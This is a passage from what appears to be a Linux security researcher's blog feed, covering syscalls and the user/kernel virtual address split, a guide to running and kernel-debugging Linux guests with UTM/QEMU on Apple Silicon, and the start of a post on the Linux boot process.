</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">1880536</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5013000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab5039000</span><span class="p">,</span> <span class="mi">1355776</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_EXEC</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x26000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5039000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab5184000</span><span class="p">,</span> <span class="mi">311296</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x171000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5184000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab51d0000</span><span class="p">,</span> <span class="mi">24576</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_DENYWRITE</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mh">0x1bc000</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51d0000</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="mh">0x7f9ab51d6000</span><span class="p">,</span> <span class="mi">33240</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_FIXED</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab51d6000</span>
</span></span><span class="line"><span class="cl"><span class="n">close</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span>                                <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mmap</span><span class="p">(</span><span class="n">NULL</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_PRIVATE</span><span class="o">|</span><span class="n">MAP_ANONYMOUS</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x7f9ab5011000</span>
</span></span><span class="line"><span class="cl"><span class="n">arch_prctl</span><span class="p">(</span><span class="n">ARCH_SET_FS</span><span class="p">,</span> <span class="mh">0x7f9ab51e0580</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x7f9ab51d0000</span><span class="p">,</span> <span class="mi">12288</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x563a56a14000</span><span class="p">,</span> <span class="mi">4096</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">mprotect</span><span class="p">(</span><span class="mh">0x7f9ab523c000</span><span class="p">,</span> <span class="mi">8192</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">munmap</span><span class="p">(</span><span class="mh">0x7f9ab51e1000</span><span class="p">,</span> <span class="mi">180840</span><span class="p">)</span>          <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">newfstatat</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&#34;&#34;</span><span class="p">,</span> <span class="p">{</span><span class="n">st_mode</span><span class="o">=</span><span class="n">S_IFCHR</span><span class="o">|</span><span class="mi">0600</span><span class="p">,</span> <span class="n">st_rdev</span><span class="o">=</span><span class="n">makedev</span><span class="p">(</span><span class="mh">0x88</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">),</span> <span class="o">...</span><span class="p">},</span> <span class="n">AT_EMPTY_PATH</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="n">NULL</span><span class="p">)</span>                               <span class="o">=</span> <span class="mh">0x563a56b24000</span>
</span></span><span class="line"><span class="cl"><span class="n">brk</span><span class="p">(</span><span class="mh">0x563a56b45000</span><span class="p">)</span>                     <span class="o">=</span> <span class="mh">0x563a56b45000</span>
</span></span><span class="line"><span class="cl"><span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&#34;Hello, World!</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">,</span> <span class="mi">14</span><span class="n">Hello</span><span class="p">,</span> <span class="ne">World</span><span class="o">!</span>
</span></span><span class="line"><span class="cl"><span class="p">)</span>         <span class="o">=</span> <span class="mi">14</span>
</span></span><span class="line"><span class="cl"><span class="n">exit_group</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>                           <span class="o">=</span> <span class="err">?</span>
</span></span><span class="line"><span class="cl"><span class="o">+++</span> <span class="n">exited</span> <span class="n">with</span> <span class="mi">0</span> <span class="o">+++</span>
</span></span></code></pre></div><p><code>strace</code> allows us to trace system calls and signals. System calls are (as we can learn via <code>man syscalls</code>[2]) the fundamental interface between an application and the Linux kernel.</p>
<p>So as we can see, there&rsquo;s an awful lot going on under the hood of our little &ldquo;Hello, World!&rdquo; program - it isn&rsquo;t until the very bottom that we see our actual <code>write</code> syscall, which writes our string <code>&quot;Hello, World!&quot;</code> to <code>stdout</code> (aka the console)!</p>
<p>That&rsquo;s because the majority of that output is setting up the virtual address space for our program. It might not all make sense now, but we can see our dependencies from <code>ldd</code> being set up, as well as various memory-related syscalls including <code>brk</code>, <code>mmap</code>, <code>mprotect</code> and <code>munmap</code>.</p>
<ol>
<li>In the Linux world, basically everything is considered a process or a file, so even multiple threads of the same running program are all viewed as separate processes</li>
<li>The second section of man, <code>man 2</code>, is for syscall manuals. So if you want to read more about <code>read</code> above for example, you can use <code>man 2 read</code> for the syscall&rsquo;s man page</li>
</ol>
<h3 id="user-mode-kernel-mode">User-mode &amp; Kernel-mode</h3>
<p>So as we just saw, for a program to even be loaded into memory and run as a process, there&rsquo;s an awful lot of interaction that needs to go on with the kernel.</p>
<p>We established that syscalls act as an interface between an application and the Linux kernel, meaning that on the other end of that syscall there&rsquo;s some kernel code running.</p>
<p>Let&rsquo;s pause a moment and quickly touch on why syscalls are even a thing. Why not just have the process do the systemy thing it needs to do directly? Like in a standard library?</p>
<p>The reason is privilege levels. The tl;dr on this is that our hardware lets us select several different privilege levels, and in Linux we make use of two of these. So at any given time we are running in user-mode or kernel-mode.</p>
<p>As a result we also have the terms user-space and kernel-space. Typically stuff in user-space runs in user-mode and stuff in kernel-space runs in kernel-mode.</p>
<p>The kernel resides firmly in kernel-space and as such can only be run in kernel-mode and the only way for a user-space process to change the privilege level is via a syscall.</p>
<p><img src="https://sam4k.com/content/images/2022/01/youshallntpass.gif" alt=""></p>
<p>So, syscalls act as gatekeepers of sorts, allowing user-space processes to get the kernel to carry out specific, privileged actions on its behalf, without giving away the keys to the kingdom.</p>
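<p>To make that a little more concrete, here&rsquo;s a minimal Python sketch that asks the kernel to do the same thing as the last line of our <code>strace</code> output. It assumes that <code>os.write</code> is a thin wrapper around the <code>write</code> syscall; <code>say_hello</code> is just a name I made up for illustration.</p>

```python
import os


def say_hello(fd):
    """Ask the kernel to write our string to fd; returns the byte count."""
    # os.write hands the buffer straight to the write syscall, so the
    # return value is whatever the kernel reports as written.
    return os.write(fd, b"Hello, World!\n")


if __name__ == "__main__":
    # File descriptor 1 is stdout, just like in the strace output.
    written = say_hello(1)
    print(written)
```

<p>The return value should match the <code>= 14</code> that <code>strace</code> showed us for <code>write</code>: the process never touches the console itself, it only asks the kernel to do so and gets a result back.</p>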
<h3 id="queue-the-vm-split">Queue The VM Split!</h3>
<p>So to sum up what we know so far:</p>
<ul>
<li>Each process has its own, sandboxed, virtual address space</li>
<li>Each process needs to run kernel code to set up its VAS, done via syscalls</li>
</ul>
<p>This raises the question: after we call our syscall and transfer to kernel-mode, we&rsquo;re still running within the same process context, so how do we know where the kernel code is?</p>
<p>We map the kernel into the VAS, that&rsquo;s how! Almost like a shared library, the kernel sits alongside the process in the same address space; I mean, we have enough space, right?</p>
<p>There&rsquo;s an overhead to switching the CPU&rsquo;s context (tl;dr there are context-specific registers that get swapped in and out when we want to run in a different context, e.g. run another process), so to avoid this the kernel is mapped into the same VAS as the process.</p>
<p>This is all implemented by splitting the virtual memory into two sections, the User Virtual Address Space and the Kernel Virtual Address Space:</p>
<p><img src="https://sam4k.com/content/images/2022/01/vmsplit.png" alt=""></p>
<p>x86_64 VM split</p>
<p>On x86_64 Linux systems, we can see the lower 128TB of memory is assigned to the user virtual address space and the upper 128TB is assigned to the kernel virtual address space. The rest? Well that&rsquo;s just an unused, no man&rsquo;s land bridging the gap between the two.</p>
<p>In fact, on typical x86_64 setups today only 48 bits of the virtual address are actually used; the most significant 16 bits (MSB 16) are always set to 0 for the User VAS and 1 for the Kernel VAS. Makes it convenient for spotting what kind of address you&rsquo;re looking at in a debugger!</p>
<p>The exact proportions of the VM split and details like how many bits are used for addressing are architecture &amp; config specific.</p>
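<p>As a rough illustration of that debugger trick, here&rsquo;s a small Python sketch that sorts an address into one of the two halves. It assumes the 48-bit x86_64 layout described above, and it checks bit 47 along with the top 16 bits so that anything in no man&rsquo;s land gets flagged. <code>classify</code> and <code>HALF_SIZE</code> are illustrative names; the first address comes from the <code>strace</code> output earlier, the other two are made-up examples.</p>

```python
# Size of each half of the split when 48 address bits are in use (128 TiB).
HALF_SIZE = 2**47


def classify(addr):
    """Classify a 64-bit virtual address, assuming 48-bit x86_64 addressing."""
    top = addr // HALF_SIZE  # bits 63..47 of the address as an integer
    if top == 0:
        return "user"           # all upper bits clear: lower half
    if top == 2**17 - 1:
        return "kernel"         # all upper bits set: upper half
    return "non-canonical"      # somewhere in the unused gap


if __name__ == "__main__":
    for addr in (0x7f9ab51e1000, 0xffffffff81000000, 0x0000800000000000):
        print(hex(addr), classify(addr))
```

<p>On a setup with a different split or more address bits the constants would change, so treat this as a sketch of the idea and not a universal check.</p>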
<h2 id="next-time">Next Time!</h2>
<p>Today we laid the groundwork for our journey to understanding virtual memory on modern Linux systems. We briefly covered what we mean when we talk about physical vs virtual memory, followed by an understanding of the virtual address space itself.</p>
<p>Now that we understand how (and at a high level why) the virtual address space is split up into the two sections - the User VAS &amp; Kernel VAS - next time we can delve deeper into each of these sections.</p>
<p>Furthermore, I want us to get a closer look at the lower-level details of what&rsquo;s going on behind the scenes in the kernel with regard to memory management, as well as touching on the role the hardware plays in enabling this.</p>
<p>And likely much, much more - so stay tuned!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Setting Up A Virtualised (Linux) Empire on Apple Silicon</title><description>Follow me on my journey moving my virtualisation workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.</description><link>https://sam4k.com/setting-up-a-virtualised-linux-empire-on-apple-silicon/</link><guid isPermaLink="false">61d4eaa5484d4d42c8e4a6aa</guid><category>linux</category><category>macos</category><category>tooling</category><dc:creator>sam4k</dc:creator><pubDate>Sat, 08 Jan 2022 19:07:10 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/01/behold.gif" medium="image"/><content:encoded><![CDATA[<p>I recently started an awesome new role as a Sr. Security Researcher (yay me) and as a work from home position this came with the perk of picking some shiny new work kit; with the two main contenders being a new Dell Precision or a MacBook Pro.</p>
<p>In my infinite wisdom (read: hubris), of course I opted for the new MacBook Pro - after all, with all the headlines and buzz, I wanted to see what this M1 fuss was all about!</p>
<p><img src="https://sam4k.com/content/images/2022/01/oops.jpg" alt=""></p>
<p>The panic started to set in, had I made a horrific decision? In getting caught up in the hype and excitement I&rsquo;d forgotten the implications of switching my workflow to a completely different architecture, and one as new as Apple&rsquo;s Silicon.</p>
<p>However, after some time researching, tweaking and debugging I&rsquo;m now in a position where I can happily say I have no regrets moving to Apple Silicon and in fact am beginning to see what the hype is all about! Of course, this isn&rsquo;t to say the grass really is perfectly green on the other side; there are still issues, particularly due to its infancy, but more on that soon!</p>
<p>So without further ado, below is the culmination of moments of bewilderment, exasperation and elation as I transitioned my workflow as a Linux security researcher from Linux x86_64 to MacOS aarch64.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#my-virtualised-empire">My Virtualised Empire</a></li>
<li><a href="#virtualisation-options-on-m1">Virtualisation Options on M1</a></li>
<li><a href="#utm-a-whistle-stop-tour">UTM: A Whistle-stop Tour</a>
<ul>
<li><a href="#aarch64-guests">Aarch64 Guests</a></li>
<li><a href="#x8664-guests">x86_64 Guests</a>
<ul>
<li>Performance</li>
<li>Weirdness</li>
</ul>
</li>
<li><a href="#networking">Networking</a></li>
<li><a href="#kernel-debugging-with-gdb">Kernel Debugging with GDB</a>
<ul>
<li>Host-Guest</li>
<li>Guest-Guest</li>
<li>Also, No GDB on HVF</li>
</ul>
</li>
<li><a href="#resizing-disks">Resizing Disks</a></li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="my-virtualised-empire">My Virtualised Empire</h2>
<p>So, turns out the title might have been a little clickbaity, as my virtual empire is more of a virtual hamlet. Before I take any more of your time, take a look at the diagram below:</p>
<p><img src="https://sam4k.com/content/images/2022/01/netdiag.png" alt=""></p>
<p>This is the general gist of what I set out to, and outline how to, achieve in this post. As a security researcher and Linux enthusiast there were a few important factors:</p>
<ul>
<li>I want a &lsquo;dev&rsquo; guest that would run Linux and be my main development workhorse; this is where I&rsquo;d be spending a lot of time so performance is key</li>
<li>I need to be able to spin up a variety of &lsquo;research&rsquo; guests; likely short lived and many so ease of setup is important</li>
<li>Speaking of variety, I need to be able to spin up guests running on different architectures, specifically aarch64 (native) and x86_64 (emulated)</li>
<li>Finally, I break things &hellip; often. So debugging is important too! While not strictly relevant to the overarching topic of virtualisation, I&rsquo;ll touch on this briefly</li>
</ul>
<p>And, well, that&rsquo;s about it! If this sounds of any interest to you, feel free to continue reading as I outline how I achieved this setup, the thought process behind some of my choices and, likely most relevant, some of the gotchas I encountered along the way.</p>
<h2 id="virtualisation-options-on-m1">Virtualisation Options on M1</h2>
<p>Before receiving my MacBook Pro, I primarily worked in Linux environments and my virtualisation software of choice was VMWare Workstation. Moving to MacOS, I wasn&rsquo;t sure what the virtualisation ecosystem was like.</p>
<p>Unsurprisingly VMWare was still a big name, with their MacOS software hypervisor <a href="https://www.vmware.com/uk/products/fusion.html">Fusion</a> being popular. However, it wasn&rsquo;t the only contender. <a href="https://www.parallels.com/uk/">Parallels</a> is another popular choice for virtualisation on MacOS. Slightly less in the limelight were <a href="https://www.virtualbox.org">VirtualBox</a> and QEMU-based <a href="https://mac.getutm.app">UTM</a>.</p>
<p>I won&rsquo;t bore you with a breakdown of the various features, pros and cons for each of these products because in the end it was an extremely simple decision. Mainly due to the fact that UTM is the only one (at the time of writing) that meets all my criteria above.</p>
<p>As far as I know, VMWare and Parallels have no plans to support x86_64 emulation on M1&rsquo;s and VirtualBox doesn&rsquo;t have any kind of M1 support yet. See? Easy!</p>
<h2 id="utm-a-whistle-stop-tour">UTM: A Whistle-stop Tour</h2>
<p><img src="https://sam4k.com/content/images/2022/01/buckleup.gif" alt=""></p>
<p><a href="https://mac.getutm.app">UTM</a> is another piece of virtualisation software built specifically for Apple products. What&rsquo;s really neat about UTM for my criteria is that it&rsquo;s built on top of <a href="https://www.qemu.org">QEMU</a>. For those that haven&rsquo;t heard of it, QEMU is a free and open-source machine emulator and virtualiser. In particular:</p>
<ul>
<li>UTM can use Apple&rsquo;s hypervisor framework<a href="https://developer.apple.com/documentation/hypervisor">[1]</a> to virtualise aarch64 guests at near native speeds, which is great for my dev box!</li>
<li>Furthermore, UTM provides the option to use QEMU&rsquo;s Tiny Code Generator (TCG)<a href="https://wiki.qemu.org/Documentation/TCG">[2]</a> which allows us to emulate different architectures (at a significant performance cost)</li>
<li>For those that have used QEMU in the past, UTM provides an amazingly simplified yet flexible front-end for the deluge of different parameters QEMU can take</li>
<li>By using QEMU, we have access to the gdbstub QEMU employs for kernel-level debugging (with caveats below)</li>
</ul>
<p>For people reading this near time of publication, I heartily recommend using the UTM 3.0.0 (beta) release which can be found <a href="https://github.com/utmapp/UTM/releases/tag/v3.0.0">here</a>. It adds some important features, as well as some neat quality of life improvements.</p>
<ol>
<li><a href="https://developer.apple.com/documentation/hypervisor">https://developer.apple.com/documentation/hypervisor</a></li>
<li><a href="https://wiki.qemu.org/Documentation/TCG">https://wiki.qemu.org/Documentation/TCG</a></li>
</ol>
<h3 id="aarch64-guests">Aarch64 Guests</h3>
<p>Okay, let&rsquo;s start off with the simplest setup. If you have no architecture requirements, you definitely want to run an aarch64 guest to match your M1 host&rsquo;s architecture. This allows you to make full use of Apple&rsquo;s hypervisor framework and get the best performance.</p>
<p>In terms of guest OS, you&rsquo;ll need to make sure you&rsquo;re running an arm64/aarch64 build! Unfortunately the demand is still scaling up for these, so you may find your favourite distro doesn&rsquo;t support it yet. I made do with Ubuntu 22.04 Jammy, as they have an aarch64 desktop build handy<a href="https://cdimage.ubuntu.com/daily-live/current/">[1]</a>. For Arch users, there&rsquo;s also <a href="https://archlinuxarm.org">ArchLinux ARM</a>.</p>
<p>For setup, it&rsquo;s really as simple as following the UTM setup wizard[2]. The main thing to remember is that we want to choose &ldquo;Virtualise&rdquo; as we don&rsquo;t need to emulate another architecture. Other than that, it&rsquo;s all fairly straightforward. No tweaks needed!</p>
<ol>
<li><a href="https://cdimage.ubuntu.com/daily-live/current/">https://cdimage.ubuntu.com/daily-live/current/</a></li>
<li>Requires UTM 3.0.0+</li>
</ol>
<h3 id="x8664-guests">x86_64 Guests</h3>
<p>Moving on, now we&rsquo;ve got our dev guest up, what if we want to do some x86_64 activities? Again using the UTM wizard, this time we&rsquo;ll want to select &ldquo;emulation&rdquo; and proceed with the rest of the wizard. So far so good!</p>
<p>Now for the bad news: in order to emulate another architecture we need to use TCG, QEMU&rsquo;s Tiny Code Generator. Unsurprisingly, emulating a completely different CPU architecture is a lot slower than using the native hypervisor like we could for our aarch64 guest.</p>
<h4 id="performance">Performance</h4>
<p>To mitigate the impact of this, there are a few things we can do:</p>
<ul>
<li>Avoid GUIs where possible! That&rsquo;s right, pick up a server edition or something</li>
<li>If you must, be stingy on resolution where possible; in the <code>VM settings -&gt; &quot;Display&quot;</code>, consider the graphics type and disabling retina mode</li>
<li>Go into <code>VM settings -&gt; &quot;System&quot; -&gt; &quot;Show Advanced Settings&quot;</code> and make sure to up the cores if possible and check &ldquo;Force Multicore&rdquo;; on x86_64 at least this is seen to have marked improvements on perf</li>
<li>In the same section as above, I&rsquo;d also recommend the <code>qemu64</code> CPU for best compatibility results unless you have specific requirements</li>
</ul>
<p><img src="https://sam4k.com/content/images/2022/01/x86_64.jpg" alt=""></p>
<h4 id="weirdness">Weirdness</h4>
<p>Again, unsurprisingly, weird things can crop up when running a fully-fledged Linux operating system on an emulated architecture, and I mean WEIRD. Programs not working? System errors popping up? Kernel panics?</p>
<p>This could be a result of missing &ldquo;CPU Flags&rdquo;, under the <code>VM settings -&gt; &quot;System&quot; -&gt; &quot;Show Advanced Settings&quot;</code>. Yep, there&rsquo;s a lot. Over the years these have accumulated and you might find that some x86_64 instructions that are being run in your guest might require specific flags to be enabled.</p>
<p>I had a situation where some software was starting up and then instantly crashing. Some digging later and it turned out its kernel driver was failing to load due to a <code>SIGILL</code>, triggered by a specific instruction in a crypto library it was using. It was a matter of googling <code>&lt;instruction_here&gt; cpu flag</code> and I was able to find the culprit.</p>
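<p>Once you know which flag you&rsquo;re after, one way to double-check whether the guest actually sees it is the <code>flags</code> line in <code>/proc/cpuinfo</code>. Below is a minimal Python sketch of that check, assuming an x86_64 Linux guest; the helper names, the sample text and the flags being looked up are all made up for illustration.</p>

```python
def parse_cpu_flags(cpuinfo_text):
    """Return the set of CPU flags from the first 'flags' line of cpuinfo text."""
    for line in cpuinfo_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "flags":
            return set(value.split())
    return set()


def missing_flags(cpuinfo_text, wanted):
    """Return, sorted, the wanted flags that the guest CPU does not advertise."""
    return sorted(set(wanted) - parse_cpu_flags(cpuinfo_text))


# Illustrative sample only; on a real guest we read /proc/cpuinfo instead.
SAMPLE = "processor\t: 0\nmodel name\t: QEMU Virtual CPU\nflags\t\t: fpu sse sse2 aes\n"

if __name__ == "__main__":
    try:
        with open("/proc/cpuinfo") as f:
            text = f.read()
    except OSError:
        text = SAMPLE
    print(missing_flags(text, ["aes", "avx2"]))
```

<p>Anything this reports as missing is a candidate to enable under &ldquo;CPU Flags&rdquo; in UTM, provided the emulated CPU can actually provide it.</p>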
<h3 id="networking">Networking</h3>
<p>After years spinning up my own shoddy initramfs based QEMU VMs through bash scripts, I learned to stay clear of any kind of networking. It just never panned out. Luckily, I can say the absolute opposite for UTM. For me, it just worked.</p>
<p><img src="https://sam4k.com/content/images/2022/01/net.jpg" alt=""></p>
<p>All of my VMs are configured with the &ldquo;Shared Network&rdquo; network mode, in the <code>VM settings -&gt; &quot;Network&quot;</code>, with the <code>virtio-net-pci</code> card. With this setup, each of your guests can access the internet like a classic NAT setup, with the added bonus of a bridge on the host which will allow all your guests (and host) to communicate with one another.</p>
<h3 id="kernel-debugging-with-gdb">Kernel Debugging with GDB</h3>
<p>The process of setting this empire up, let alone my job, required being able to do some kernel debugging on my guests. Like other virtualisation software, QEMU provides a gdbstub which acts as a gdb server for your guest, allowing you to connect remotely and debug the guest&rsquo;s kernel - it&rsquo;s pretty neat<a href="https://qemu.readthedocs.io/en/latest/system/gdb.html">[1]</a>.</p>
<ol>
<li><a href="https://qemu.readthedocs.io/en/latest/system/gdb.html">https://qemu.readthedocs.io/en/latest/system/gdb.html</a></li>
</ol>
<h4 id="host-guest">Host-Guest</h4>
<p>UTM uses the exact same arguments as QEMU, if you&rsquo;re familiar with that, so we just need to add the <code>-s</code>[1] argument to our guest and it&rsquo;ll set up the gdbstub for your <em>GUEST</em> to listen on <code>localhost:1234</code> on your <em>HOST.</em></p>
<p>To do this we go to <code>VM settings -&gt; &quot;QEMU&quot;</code>. This section will show you how your configuration and settings translate into QEMU arguments. If we scroll to the bottom there&rsquo;s an input labelled &ldquo;New&rdquo; where we can add our own. Pop in <code>-s</code> and we&rsquo;re good!</p>
<p><img src="https://sam4k.com/content/images/2022/01/hostdbg.jpg" alt=""></p>
<p>Now, if we open the terminal on our MacOS host and start gdb w- just kidding, gdb doesn&rsquo;t have a build available for M1&rsquo;s at the time of writing. But you CAN use lldb to connect to the remote server currently listening on <code>localhost:1234</code> if you&rsquo;re so inclined, otherwise&hellip;</p>
<ol>
<li>QEMU users might be used to <code>-s -S</code>, where the <code>-S</code> will tell QEMU to not start the guest until you tell it to via gdb; this is already in use by UTM as far as I can tell, so we just make do without</li>
</ol>
<h4 id="guest-guest">Guest-Guest</h4>
<p>Ew, lldb right?! You might instead want to debug a guest from another guest; in my case I want to be able to use gdb on my dev guest to debug one of my research targets.</p>
<p>Fortunately, it&rsquo;s not much work. As I mentioned above, the QEMU <code>-s</code> sets up a gdbstub to listen on <code>localhost:1234</code>. This is because it&rsquo;s shorthand for the option <code>-gdb tcp:localhost:1234</code>. So all we need to do is change localhost to the address of the bridge interface our host uses to communicate with the guests.</p>
<p><code>ifconfig -a</code> on your macOS terminal will show you all your interfaces and you should see <code>bridge100</code> or similar with an IP address ending in <code>.1</code> that matches your guest LAN. For me this is <code>192.168.64.1</code>; my guests can reach my macOS host via this IP. So this is where we&rsquo;ll set up our gdbstub to listen, like so:</p>
<p><img src="https://sam4k.com/content/images/2022/01/guestdbg.jpg" alt=""></p>
<p>Now from my dev VM I&rsquo;ll be able to access the listener, allowing me to debug any other guests on the shared network, neat! I can do this in gdb with the following command:</p>
<p><code>(gdb) target remote 192.168.64.1:1234</code></p>
<h4 id="also-no-gdb-on-hvf">Also, No GDB on HVF</h4>
<p>Remember I said something about the grass not being so green? Well, hvf (QEMU&rsquo;s accelerator that uses Apple&rsquo;s hypervisor framework) doesn&rsquo;t support breakpoints (hardware or otherwise) via the gdbstub as of the time of writing (version 6.2.0 is used by UTM currently).</p>
<p>This means that whenever you want to debug (with breakpoints) a guest, regardless of the architecture, you need to make sure you go into <code>VM settings -&gt; &quot;QEMU&quot;</code> and uncheck <code>&quot;Use Hypervisor&quot;</code>. Yep, it&rsquo;s going to be slower, but it won&rsquo;t be forever.</p>
<h3 id="resizing-disks">Resizing Disks</h3>
<p>Something that might come in handy for some is knowing how to resize your guests&rsquo; disks, without having to attach a new one and go through that whole rigamarole.</p>
<p>For this you&rsquo;ll need to use QEMU in the terminal and I couldn&rsquo;t immediately find any binaries UTM might be using in their package, so I installed it via Brew, using <code>brew install qemu</code> - fairly straightforward.</p>
<ol>
<li>The command <code>qemu-img resize ~/Library/Containers/com.utmapp.UTM/Data/Documents/&lt;YOUR VM&gt;.utm/Images/disk-0.qcow2 +10G</code> will allow you to extend your VM&rsquo;s disk by 10GB.
<ul>
<li>Make sure you choose the right VM folder and disk!</li>
</ul>
</li>
<li>Depending on your guest OS, you&rsquo;ll likely need to do some additional tinkering to get the system to use the additional space, typically by extending the partition or logical volume
<ul>
<li>E.g. for extending LVM, you can follow <a href="https://fabianlee.org/2016/07/26/ubuntu-extending-a-virtualized-disk-when-using-lvm/">this guide</a></li>
</ul>
</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p>And that&rsquo;s pretty much it! As you can see it&rsquo;s not a particularly hands-on process, it just takes a bit of research and knowing what to use and what workarounds to take. If there are any additional gotchas or tips I stumble upon, I&rsquo;ll add them to this post.</p>
<p>I&rsquo;ve no doubt the ecosystem and support for Apple silicon will only improve and honestly I&rsquo;ve been impressed by the speed at which the open-source community has adopted it.</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The (Modern) Boot Process [0x02]</title><description>Welcome to the second part of my totally-wasn&amp;#39;t-meant-to-be-a-one-part Linux internals post on the modern boot process! Last time I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your stor</description><link>https://sam4k.com/linternals-the-modern-boot-process-part-2/</link><guid isPermaLink="false">615b0a0e484d4d42c8e4a1b1</guid><category>linux</category><category>kernel</category><dc:creator>sam4k</dc:creator><pubDate>Sun, 10 Oct 2021 14:13:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2021/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>Welcome to the second part of my totally-wasn&rsquo;t-meant-to-be-a-one-part Linux internals post on the modern boot process! <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">Last time</a> I set the scene and covered the GUID Partition Table (GPT) scheme for formatting your storage device; briefly touched on what happens when you power on your computer and what happens when it hands over control to UEFI.</p>
<p>So without any more rambling and rehashing, let&rsquo;s jump right back into the action. UEFI has just consulted the EFI variables in NVRAM to determine boot order, located the first available bootloader on the list and will now transfer control over to it &hellip;</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x03-optional-bootloader">0x03 Optional Bootloader</a>
<ul>
<li><a href="#wait-this-is-optional">Wait This Is Optional?</a></li>
</ul>
</li>
<li><a href="#0x04-the-kernel-setup">0x04 The Kernel (Setup)</a>
<ul>
<li><a href="#getting-to-main">Getting to Main</a></li>
<li><a href="#the-first-c">The First C</a></li>
<li><a href="#and-back-to-assembly">And Back To Assembly</a></li>
<li><a href="#decompression-time">Decompression Time!</a>
<ul>
<li>First Some Background</li>
<li>Back To Decompression</li>
</ul>
</li>
</ul>
</li>
<li><a href="#0x05-the-kernel-initialisation">Next Time</a></li>
</ul>
<h2 id="0x03-optional-bootloader">0x03 Optional Bootloader</h2>
<p><img src="https://sam4k.com/content/images/2021/10/obhwg.gif" alt=""></p>
<p>There&rsquo;s a number of different bootloaders out there that you can use with your Linux system, each with their own pros and cons, but at their core they&rsquo;ll all need to meet the requirements laid out by the Linux Boot Protocol[1].</p>
<p>For reference, any specifics in this section will be referring to the common GNU GRUB 2 bootloader. It&rsquo;s worth noting that while we&rsquo;re operating within a Linux context, GRUB 2 and other bootloaders are capable of booting a variety of systems, not just Linux.</p>
